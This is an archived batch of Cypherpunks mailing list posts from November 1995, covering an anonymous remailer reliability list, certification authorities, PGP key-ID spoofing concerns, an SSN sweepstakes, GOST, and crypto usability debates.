$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ek ksub";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(robo syrinx c2)
(flame hacktic replay)
(alumni portal)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Last update: Mon 27 Nov 95 6:46:42 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
hroller  hroller@c2.org                   +*#####---##    46:11  99.99%
robo     robo@c2.org                      +  ####--*##    39:57  99.75%
amnesia  amnesia@chardos.connix.com                 *+    39:12  99.66%
mix      mixmaster@remail.obscura.com     -- ---_.--.   6:36:54  99.37%
hacktic  remailer@utopia.hacktic.nl       +*  **** ***     8:47  98.47%
replay   remailer@replay.com              +*. ***  ***     6:20  98.31%
c2       remail@c2.org                     + ++++- +**  1:12:49  97.94%
ecafe    cpunk@remail.ecafe.org           +* .-- # ###    46:27  97.81%
flame    remailer@flame.alias.net         +*   **  ***    17:41  97.50%
rmadillo remailer@armadillo.com           ++  +++  +++    39:47  97.23%
portal   hfinney@shell.portal.com         +*#*# #  *##      :28  96.79%
spook    remailer@valhalla.phoenix.net     ** ***  ***    28:42  96.76%
alumni   hal@alumni.caltech.edu            +    *  +*      3:02  96.68%
wmono    wmono@valhalla.phoenix.net        *  ***   **    13:11  96.44%
vishnu   mixmaster@vishnu.alias.net         * ***  * *     8:55  95.93%
extropia remail@extropia.wimsey.com       -------  --   5:04:15  95.47%
penet    anon@anon.penet.fi               ----  -- -+   6:23:22  95.06%
ideath   remailer@ideath.goldenbear.com   -- - -_  .-  11:42:46  95.01%
bsu-cs   nowhere@bsu-cs.bsu.edu            *  ##   # #      :29  90.69%
rahul    homer@rahul.net                  +*  +**  +*-    21:04  98.77%
shinobi  remailer@shinobi.alias.net             +  +*+    24:54  85.54%
ford     remailer@bi-node.zerberus.de     *  +++  ++    6:56:02  80.39%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 28 Nov 1995 01:08:16 +0800
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <30B99C34.2A1F@netscape.com>
Message-ID: <199511271641.IAA21657@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	You can also snag the apache/ssl webserver and set one up for
yourself, to see what it looks like. Non-commercial use only, as
limited by the RSAREF license.
	The SSL webserver on c2.org is "verisign blessed", so you
can't use it for testing. (Hm, someone should think up a suitably
derisive term of that..)

> 
> Alex Strasheim wrote:
> > 
> > > Basicly when the browser finds a new CA that it does know about it promts
> > > the user and through a series of dialog boxes the user chooses to trust it
> > > or not.
> > 
> > Is anyone running an ssl web server that would let us see how this works?
> 
>   A little bird pointed me toward https://www.secret.org.  I have no
> idea who they are...
> 
> 	--Jeff
> 
> -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Tue, 28 Nov 1995 01:23:55 +0800
To: Wei Dai <weidai@eskimo.com>
Subject: Re: Elliptic curves, current status?
Message-ID: <acdf958f00021004c3b1@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 9:48 PM 11/26/95, Wei Dai wrote:
....
>The IEEE p1363 group's working draft on elliptic curve standard may help
>you here.  You can find it at ftp://ftp.rsa.com/pub/p1363/draft/ec.ps
>
>One reason for confusion about the speed of elliptic curve cryptosystems is
>the small number of implementations.  A paper in Crypto 95 claimed that
>for doing key exchange, an elliptic curve algorithm takes about the same
>time and has about the same level of security as DH with 512 bit modulus,
>and that elliptic curve has a speed advantage if greater security is
>desired.
>
>Wei Dai

Thanks much! I will look at the paper.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an197098@anon.penet.fi
Date: Mon, 27 Nov 1995 17:37:25 +0800
To: cypherpunks@toad.com
Subject: spooky URL
Message-ID: <9511270916.AA16235@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



while visiting  http://www.mcs.com/~candyman/http/boom.html, I noticed that my Netscape's status line mentions an attempt to connect to:

g1.internet-audit.com

a little spooky... any ideas what is happening??


I prefer e-mail. 
reply (anonymously)     to an197098@anon.penet.fi
reply (NON-anonymously) to na197098@anon.penet.fi








--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 27 Nov 1995 22:44:40 +0800
To: cypherpunks@toad.com
Subject: ETH_ic?
Message-ID: <199511271435.JAA05550@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-27-95. NYPaper:

   "An Intel computer security expert runs afoul of the law.
   So much for the 'hacker ethic'?"

      Regardless of whether one sees Randal Schwartz as a
      white knight with questionable judgment or a computer
      criminal who deserves jail time, his tale contains
      valuable lessons for anyone who uses or manages a
      corporate computer system. On the Internet, computer
      programmers and systems administrators have debated
      whether Mr. Schwartz was a hero or a criminal. The
      on-line jury is divided. Most concluded that he was
      guilty of poor judgment, not criminal intent. Some say
      the case has killed the hacker ethic. "If I saw someone
      on the Internet with a security weakness, at this point
      I would be reluctant to act the Good Samaritan and
      report it," said Jeffrey Kegler, an independent software
      consultant in Sunnyvale Calif. "If I saw weakness in
      Intel's machine, I'd keep it to myself."

   ETH_ic?  (7 kb)













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 27 Nov 1995 23:00:06 +0800
To: cypherpunks@toad.com
Subject: EXH_ume
Message-ID: <199511271450.JAA07253@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-27-95. NYPaper, Lead story:

   "U.S. Will Deploy Its Spy Satellites on Nature Mission. A
   Huge Environmental Study Gives a New Lease on Life to
   Intelligence Systems."

      The new program is directing spy satellites to study
      about 500 ecologically sensitive sites around the
      world. The data will be archived for future generations 
of
      scientists and will remain secret for now to conceal the
      abilities of the nation's reconnaissance systems. The
      monitoring effort is led by Medea, an avaricious group of
      about 60 scientists in academia and industry who advise
      the nation's intel clubhouses on the use of secret
      data to "study" the environment. The new reconnaissance
      effort is run for Medea by agony aunt NRO and is
      coordinated by dead-baby CIA.

      The program is very different from the related effort to
      mine old spy-satellite photos for environmental data, a
      wallet-rip the Clinton Administration recently began. So
      too, the program is different from recent intelligence
      gathering that studies natural phenomena for clues to
      ingenious tax milking.

      The Federation of American Scientists said the
      environmental reconnaissance was "potentially a
      watershed in the reform of intelligence," adding, "It
      reflects an expanding teat of national insecurity."

   EXH_ume  (11 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Connie Sadler <SADLER_C@HOSP.STANFORD.EDU>
Date: Tue, 28 Nov 1995 02:46:01 +0800
To: cypherpunks@toad.com
Subject: Encrypted Email
Message-ID: <C177ZWAZEVVK8*/R=REN/R=HOSP/U=SADLER_C/@MHS.STANFORD.EDU>
MIME-Version: 1.0
Content-Type: text/plain


    
    Can anybody briefly summarize for me some options for encrypting email 
    that are secure? I know about PGP but I need something for (my 
    environment) with an easy to use interface (PC-Windows) - for use by 
    people who really aren't very computer literate.
    
    Any ideas?
    
    Thanks!
    
    Connie
    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <alex@proust.suba.com>
Date: Tue, 28 Nov 1995 01:11:16 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Chi Sun Times SS# Sweepstakes
Message-ID: <199511271654.KAA02460@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


The Chicago Sun-Times is running a contest in which readers are asked to
send in their social security numbers.  Someone will win a cash prize
after a random drawing. 

I can't figure out the angle on this.  If they simply want to run a
promotional contest, why are they asking for ssn's?  If there's an
ulterior motive, what is it?  Are they going to sell the list?  Would they
have a use for it themselves?

The frustrating thing is that there are probably many millions of
Americans who will give away the keys to the store for next to nothing. 

The feds probably made a tactical error:  instead of trying to force
mandatory key escrow down our throats, they ought to have offered everyone
who is willing to submit to voluntary escrow a chance to win a Chrysler
Minivan.

--
Alex Strasheim, alex@proust.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Tue, 28 Nov 1995 03:33:05 +0800
To: cypherpunks@toad.com
Subject: The future will be easy to use
Message-ID: <Pine.SUN.3.91.951127104220.6244B-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Here's a quote from Bill Gates' book:

   The mechanism that will make this possible is based on
   mathematical principles, including what are called
   "one-way functions" and "public-key encryption." These
   are quite advanced concepts, so I'm only going to touch
   on them. Keep in mind that regardless of how complicated
   the system is technically, it will be extremely easy for
   you to use. You'll just tell your information appliance
   what you want it to do and it will seem to happen
   effortlessly.

(Thanks to the anonymous person who typed it in)

   We may not all like Bill Gates, and some of us even boycott his 
software, but we must admit he is a very shrewd businessman and knows 
which side of his toast is buttered. I think this paragraph is right on 
the mark. The competition for which cryptographic protocol wins will be 
decided on the basis of usability.

   The "dark forces" are no doubt aware of this fact, and have already
made some advances in this area. One example is the Fortezza card. 

   If cypherpunks are to have any hope of getting their vision of strong 
crypto implemented and deployed, it has to be in the context of usable 
systems.

   Form this perspective, let's take a look at the recent thread on
"establishing trust." Carl Ellison advocates the MOSS alias system. My
understanding of this system is that individual users associate "aliases" 
with public keys. If done right, it can work well. However, from a
usability perspective, it is just one more trouble spot. 
   First, on what basis will users decide which keys are worthy of being
assigned which aliases? Public keys are big hunks of base64 encoded
gibberish. They are difficult to present in a user interface, difficult 
to communicate in alternate, known secure channels (such as telephone 
calls and face to face communication). There is no way that a person 
could memorize one.
   The other issue is how much time and energy the user has to spend 
keeping the alias database up to date. There is no way to communicate 
securely with anyone who's not in the database. If the user is 
communicating with a large number of people, then it's very tempting to 
get sloppy.

   There's no way around it. This kind of system will not make it in the 
big time. As I see it, any system that does must have the following 
properties:

   * Some variant on the Web of Trust.

   * Online key-servers for getting keys in real time.

   * A clean mechanism for validating keys through alternate channels.

   There are three possible outcomes: we build it, the NSA builds it, or 
Microsoft/Netscape builds it. This last outcome might not be so bad, but 
only in the first one can we rely on our principles being advanced.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Tue, 28 Nov 1995 01:27:21 +0800
To: Alex Strasheim <alex@proust.suba.com>
Subject: Re: [NOISE] Chi Sun Times SS# Sweepstakes
In-Reply-To: <199511271654.KAA02460@proust.suba.com>
Message-ID: <Pine.OSF.3.91.951127110933.4219A-100000@beall.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain


One reason for the ssn's is that it maybe a LEA sponsered promo. If you a 
dumb enough to have a warrent or other some judgement against you and you 
give your ssn and address to a person or enity that you don't know then 
shame on you.

Dan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 28 Nov 1995 04:14:42 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Certification Authority
Message-ID: <199511271952.LAA26633@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:20 AM 11/25/95 -0800, you wrote:
>At 01:53 AM 11/26/95 -0800, anonymous-remailer@shell.portal.com wrote:
>>You'd rather sign before encryption??
>>Doesn't that give you "known plain-text" to attack?
>
>The signature is not known unless the whole message being signed is
>known.

Signatures often have known, or easily guessed, plaintext in them,
like the signer's name or ID number, or various header fields
such as X.509's equivalent to ----- BEGIN PGP ....

>And any encryption scheme that is vulnerable to known plaintext attack
>where only a part of the message is known, is worthless anyway.

DES isn't worthless.  It's a bit weak, but not worthless.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 28 Nov 1995 04:12:19 +0800
To: cypherpunks@toad.com
Subject: Re: GOST for sale
Message-ID: <199511271952.LAA26668@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:43 AM 11/24/95 +0100, Mats Bergstrom <asgaard@sos.sll.se> wrote:
>According to a short article in a Swedish newspaper (DN)
>with the title 'Spy Code of KGB can make computers safe', 
>JETICO INC., located in Finland (Tammerfors), introduced
>a new crypto system on the world market last week. It's 
>based on GOST, the Russian federal standard algorithm.
>This product, called BestCrypt, is implemented at least
>partly in hardware. Alledgedly it uses 'GOST 28147-89',
>whatever that stands for.
>
>GOST is probably very secure - a huge keyspace (256 bits) and
>KGB would not have left a trapdoor for NSA to take advantage
>of, would they?

>From what I've read of GOST, it's really a family of cyphers with
different sets of S-boxes - routine military gets one set, top secret
gets another, civilian govt another, etc.  Aside from possible
differences in security level for the S-boxes, one motivation is
that you can't take civilian govt decryptors and use them to read
or forge top secret military crypto, etc.  If this is correct,
then some sets of S-boxes probably do have trapdoors (at least
susceptibility to differential cryptanalysis_; how good are the
ones that Jetico is selling, what credentials do they have to
convince us their cryptanalysis is good enough, and why are they
doing parts of it in hardware?
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Rose <Greg_Rose@sydney.sterling.com>
Date: Mon, 27 Nov 1995 09:37:52 +0800
To: Carl Ellison <cme@clark.net>
Subject: Re: establishing trust
In-Reply-To: <199511240500.AAA07836@clark.net>
Message-ID: <pgpmoose.199511271220.42718@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Carl Ellison <cme@clark.net> wrote:
  Ed Carp wrote:
  >Subject: Re: crypto for porno users
  >To: khijol!clark.net!cme@uunet.uu.net (Carl Ellison)
  >Date: Thu, 23 Nov 1995 15:57:17 -0600 (CST)
  >Cc: khijol!got.net!edge@uunet.uu.net, khijol!toad.com!cypherpunks@uunet.uu.n
 et
  >

  >totally different from this "web of trust" I keep hearing about - and that i
 s
  >*it*.  Do you trust me any more now than before I started signing my posting
 s?

  Actually, in my view, signed postings are the first step.  With those (and
  the right S/W (not there yet)), I get to know that a bunch of postings came
  from the same person.  I even know who they came from:  the person who
  is capable of signing with key 0xXXXXXXXX.

I hate to point this out, but that isn't true.
Anyone can create a key with any chosen keyid and
attach the same publicly known name to it. (see,
eg., the key I signed this with, given below).
The only unforgeable things about a particular
key are:

1. The key itself (you know, the product of the
primes),
2. The key fingerprint (unless MD5 is compromised)
and 
3. The web of trust leading to that key.

So, in practice, you actually have to look at the
key fingerprint of the key used to sign a message,
if you want to be sure of the uniqueness of that
key.

Or you have to only trust keys that come
well-introduced. Back to the Web of Trust.

  Since the only way I have of getting to know the person is through those
  postings, I get to know that person and through that knowledge I decide
  whether or not to trust.

I've been trying to think of the possible
ramifications of spoofing people's names and
keyids on a large scale. And a large scale is
certainly possible -- it only took me about an
hour to create this key. I was originally
intending to use this key as part of a real
project, to gain attention to the project, but the
more I thought about it the more I worried about
the implications. This "coming out" invalidates
any chance of that happening.

There are two bad things I can think of.
Suppose I want to somehow attack Fred. I can
create a key with the same ascii text associated
with it very easily. With only a little more
effort, I can also duplicate the keyid. PGP adds
new keys at the front of the keyring, so if I
start distributing this new key widely, it will
appear in keyrings before the "real" Fred's.
Whenever this happens automatically, there is some
possibility that the wrong key will be used for
some operations. PGP doesn't help much, because it
is hard to specify the key unambiguously in this
case.

PGP uses more than just the visible part of the
keyID. So at least it will choose the right key to
verify signatures, right? Maybe not. I can apply
the same spoofing technique to the whole internal
keyID, and generated a key that even PGP can't
tell is the wrong one. I think that when PGP tried
to check the signature on a message from the "real"
Fred that it would notice that it had applied the
wrong key, but I'm not absolutely sure on this
point. Anyway, an inattentive or somewhat
automated user will merely notice that the
document signature fails to check out, essentially
slurring the "real" Fred's reputation.

Any other possible attacks?

Greg.

Greg Rose               INTERNET: greg_rose@sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       http://www.sydney.sterling.com:8080/~ggr/
French's Forest         35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
NSW 2086 Australia.     co-mod sci.crypt.research, USENIX Director.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMLkSAqaauZzerb7vAQFpbgP+KpPj1SH746nmJca3VmEGU13t/enQL5GT
FmCGHqnqI757GRNOiHMXnNe8mMdwMn67UgxU/3a7R/UU7rspGH3P/IrmDH0NnDHG
z5QuhQcutgswz7ncNeuUxi6BRHP12SM/aNnLqCmT308zd1sL1BNL/CUgPdxNBnFT
kCe5dS0FVaI=
=mopc
-----END PGP SIGNATURE-----

-----BEGIN PGP MESSAGE-----
Version: 2.6.2i

lQHgAzBrI8cAAAEEANQqR/iaxVP8FZ5CKqI2hcYFFyWAsnNmsZsPi+nOehI1nMyi
PBzX1PPBh8pCAS+0mrUqKKUp2ArCS6n6Ph/R2VjHsqq8HFKOT14Md3C6/M15SKDV
ODcgKvfZf7gs6KEhPqcCS1P8OpGQWRczE1nTxYAw65bBRpDg7KaauZzerb7vAAUR
Adj6LAUodVxLA/4dxjQlaNqaJp5ElB0amAQ81/9Zah4Zf1j8CLVw08g5Kz4oK3hJ
dx61pjBJ2fag1/UUM6y9gIT5yL0ErK+KQ1sPdvZPe5p5JEhCV2tlqlT+d1iPdEiN
x7t986et7Zb91T+UsEyLLaTxQMKk4obDb2IvJvKgcvNm+wRW5rGNXitpRQIAGmTd
ypkNQIwWq07d+QNaFUYgTl8ZQfX078a6VMPl2DQni6uLmvUvgI3VHW8oTcpyqu5j
mJt0FTkeGMA0lKQa5AIA//fzyVUXGJEKkXIBkfCJ/F1V4dMsfZ/3z73RiNtKl46p
lMTztn/cCEUoE+GwonQhkJUnAXbBYtFifisyVf92ngH/u7YxY+z4T2SrhsYj+oGc
Ox/T2VlugUYPowQr3070OoHrrd7icwXNU69nHkle7/jnFjMTvDSZrPYZiXFa0yhV
0apCtBBQcmltZSBSaWIgTG92ZXJziQCVAwUQMLkLB6aauZzerb7vAQEHyAQApGgP
xyUR71jntGeir3yJpcBAEVkmqXLYZPb83dzVlWh7HHQmTiyE/rrcJT7NZRZGA8X7
TTPMZnITDETdwFVIkznvY8v7DWGXD8SD0LNlE61lzhmhNvsfUmQ/q4YHrCERb31P
56TPaveSwYlkPanOYLLJ7m47KICP0z3jzNgwqRo=
=DLC7
-----END PGP MESSAGE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Tue, 28 Nov 1995 01:51:27 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Chi Sun Times SS# Sweepstakes
Message-ID: <9511271738.AA28149@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:54 AM 11/27/95 -0600, Alex Strasheim wrote:
>The Chicago Sun-Times is running a contest in which readers are asked to
>send in their social security numbers.  Someone will win a cash prize
>after a random drawing. 
>
>I can't figure out the angle on this.  If they simply want to run a
>promotional contest, why are they asking for ssn's?  If there's an
>ulterior motive, what is it?  Are they going to sell the list?  Would they
>have a use for it themselves?

Alex -

  There may be *an ulterior motive* of getting the person's ssn, i.e., for
the purpose of the newspaper (and the winner) reporting winnings to IRS.  In
addition, the newspaper may also feel that, in selecting a 10-digit number,
it probably will not repeat such as someone's birthdate.  Personally, I lean
towards the former.
>
>The frustrating thing is that there are probably many millions of
>Americans who will give away the keys to the store for next to nothing. 
>The feds probably made a tactical error:  instead of trying to force
>mandatory key escrow down our throats, they ought to have offered everyone
>who is willing to submit to voluntary escrow a chance to win a Chrysler
>Minivan.

  I agree with you.  I believe *greed* is the operating word....

Regards-
Lynne


*******************************************************
Lynne L. Harrison, Esq.   |     "The key to life:
Poughkeepsie, New York    |      - Get up;
E-mail:                   |      - Survive;
lharrison@mhv.net         |      - Go to bed."
*******************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas E Zerucha <zerucha@shell.portal.com>
Date: Tue, 28 Nov 1995 05:04:59 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: Virus attacks on PGP
In-Reply-To: <199511270737.XAA20199@netcom16.netcom.com>
Message-ID: <Pine.SUN.3.90.951127123642.15406A-100000@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 26 Nov 1995, Bill Frantz wrote:

> At 11:40 11/26/95 -0800, Thomas E Zerucha wrote:
> >That woudl be interesting - even with the speaker "off" the power surge 
> >causes clicking and other signs.  Not to mention that the interrupt count 
> >would start moving (of course the virus could replace the entire OS and 
> >would only have to find 300K chunks to hide in).
> 
> I looked at the memory usage on my 1meg Mac and 5meg is used for the
> system.  I have no idea what it is all being used for.  A lot can hide
> there.
> 

But it would also have to hide in something you load at boot time.  For 
it to propogate there, it would have to make copies of itself. when crond 
and inetd and named all grow over 400K I get curious.  Dos has small 
usage, and Linux provides a link map (or I can checksum entry points or 
such).  Another fun thing to do is pkexe or gzexe.  The latter turns an 
exe into a shell script.  Patching compressed files is very difficult.

zerucha@shell.portal.com -or- 2015509 on MCI Mail
  finger zerucha@jobe.portal.com for PGP key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Tue, 28 Nov 1995 02:29:09 +0800
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: Re: Cypherpunk Certification Authority (fwd)
Message-ID: <Pine.A32.3.91.951127131057.39184B-100000@POWERED.ZOO2.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 26 Nov 1995, Robert Hettinga wrote:

> >Is this another one of those LD tentacles? ;)
> 
> Must that or a spoof of somekind... "She" didn't sign it, and "she" claims
> to have issued a signature...

Methinks some of us need to read up on undeniable interactive signature 
systems.

Ben.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQB1AwUBMLn/J75ALmeTVXAJAQGL5QL9HE+t0zKGVni03w4DvV2W1lj1807eaNRp
xD4IJcEUJ+JVk4lUJQ+zNvOf81FMPG+0QNq9tqOEDNqiG9vemD7B8C7et5PH0pFb
ktOeAw5WywsnwSeRleId1ukBktDdZR4v
=QueN
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Tue, 28 Nov 1995 05:20:26 +0800
To: Raph Levien <raph@c2.org>
Subject: Re: The future will be easy to use
Message-ID: <v02120d08acdfd6f40be1@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:06 AM 11/27/95, Raph Levien wrote:

.. stuff..

>The competition for which cryptographic protocol wins will be
>decided on the basis of usability.
.. stuff..
>   If cypherpunks are to have any hope of getting their vision of strong
>crypto implemented and deployed, it has to be in the context of usable
>systems.

.. stuff..

>   There's no way around it. This kind of system will not make it in the
>big time. As I see it, any system that does must have the following
>properties:
>
>   * Some variant on the Web of Trust.
>
>   * Online key-servers for getting keys in real time.
>
>   * A clean mechanism for validating keys through alternate channels.
>
>   There are three possible outcomes: we build it, the NSA builds it, or
>Microsoft/Netscape builds it. This last outcome might not be so bad, but
>only in the first one can we rely on our principles being advanced.

This is a very important period. The technology is young enough that a
window is open for a non-giant to produce a dominant product.

On the other hand, it takes actual coordination of resources. I'm not sure
that it is within the range of Cypherpunks to take advantage of this
window. There is still no agreement whether the group can be said to have a
single vision, nor whether people within it want to be bounded by another's
view.

If people really wish to take advantage of this and really push things, it
means forming a group, made up of Cypherpunk members perhaps, but much
smaller, and capable of working together. Also capable of handling not only
the theory, but good solid code, GUI, PR, meetings, talking to the
government, etc.

It is an open window yes, but not a simple one. I'd love to see widespread
use of secure encryption, however I don't think the potential exists within
the Cypherpunk framework to reach it as 'Cypherpunks'. The question then
is, whether Cypherpunks should change, or whether a smaller group will be
formed.

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page       ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@obscura.com>
Date: Tue, 28 Nov 1995 05:50:32 +0800
To: c2.org.mix-l@jpunix.com
Subject: Announcement: mixmaster 2.0.3 released!
Message-ID: <199511272121.NAA00088@obscura.com>
MIME-Version: 1.0
Content-Type: text/plain


Announcing the release of Mixmaster version 2.0.3
Among other improvements it includes an new and
improved Makefile. Installing Mixmaster is a SNAP!

For information about Mixmaster, and how to get it,
check out http://obscura.com/~loki or read the Mixmaster FAQ
which will be posted soon.

	-Lance




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Tue, 28 Nov 1995 05:57:51 +0800
To: Jonathan Zamick <JonathanZ@consensus.com>
Subject: Re: The future will be easy to use
In-Reply-To: <v02120d08acdfd6f40be1@[157.22.240.13]>
Message-ID: <Pine.SUN.3.91.951127130923.21091A-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 27 Nov 1995, Jonathan Zamick wrote:

> This is a very important period. The technology is young enough that a
> window is open for a non-giant to produce a dominant product.

Full agreement.

> On the other hand, it takes actual coordination of resources. I'm not sure
> that it is within the range of Cypherpunks to take advantage of this
> window. There is still no agreement whether the group can be said to have a
> single vision, nor whether people within it want to be bounded by another's
> view.
> 
> If people really wish to take advantage of this and really push things, it
> means forming a group, made up of Cypherpunk members perhaps, but much
> smaller, and capable of working together. Also capable of handling not only
> the theory, but good solid code, GUI, PR, meetings, talking to the
> government, etc.

Right.

> It is an open window yes, but not a simple one. I'd love to see widespread
> use of secure encryption, however I don't think the potential exists within
> the Cypherpunk framework to reach it as 'Cypherpunks'. The question then
> is, whether Cypherpunks should change, or whether a smaller group will be
> formed.

I think that changing the focus of cypherpunks is intractable enough that 
forming a new group is the only feasible alternative. Right now, I don't 
have the time to try to form such a group, but I would be an enhusiastic 
participant if such a group was to be formed.

Incidentally, I've had one bad experience with this type of thing (it was
the PGP 3.0 development team), so I realize it's not easy. A couple of
things I've learned from the experience: 

* Clear goals.

* A leader, someone who would call the shots, and would also serve as the
person you'd have to convince.

* Open communications. Shrouding a project in secrecy is a good way to 
kill it. This is one potential advantage we have over the spooks.

It _is_ doable. I know the skill is out there. Wei Dai, Eric Young, Peter
Gutmann, and others have proved themselves quit capable of writing good
solid code. Sameer Parekh has done an incredible job with PR. Phil Karn,
Dan Bernstein, and some others (who I'm not sure want to be named) are
talking to the government. GUI I'm less sure about, but I'd hope that some
cpunks would come out of the woodwork.

It is not a matter of ability, but of will.

Raph





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Tue, 28 Nov 1995 06:02:34 +0800
To: Raph Levien <raph@c2.org>
Subject: Re: The future will be easy to use
Message-ID: <v02120d0aacdfe235b0b7@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain


>* Clear goals.
>
>* A leader, someone who would call the shots, and would also serve as the
>person you'd have to convince.
>
>* Open communications. Shrouding a project in secrecy is a good way to
